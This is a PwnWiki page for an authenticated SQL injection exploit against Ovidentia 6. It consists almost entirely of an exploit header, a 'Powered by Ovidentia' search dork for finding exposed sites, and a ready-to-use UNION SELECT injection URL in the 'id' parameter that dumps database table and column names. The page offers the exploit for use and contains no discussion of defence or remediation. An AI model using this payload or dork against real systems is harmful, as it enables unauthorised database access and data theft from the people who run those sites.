Ovidentia 6 SQL注入漏洞

From PwnWiki
Revision as of 10:27, 30 May 2021 by Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated) # Exploit Author: Felipe Prates Donato (m4ud) # Vendor Homepage: http://www.ovidentia.org # Ver...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

EXP

# Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated)
# Exploit Author: Felipe Prates Donato (m4ud)
# Vendor Homepage: http://www.ovidentia.org
# Version: 6
# DORK : "Powered by Ovidentia"    

http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2--
Retrieved from "https://pwnwiki.com/index.php?title=Ovidentia_6_SQL注入漏洞&oldid=3617"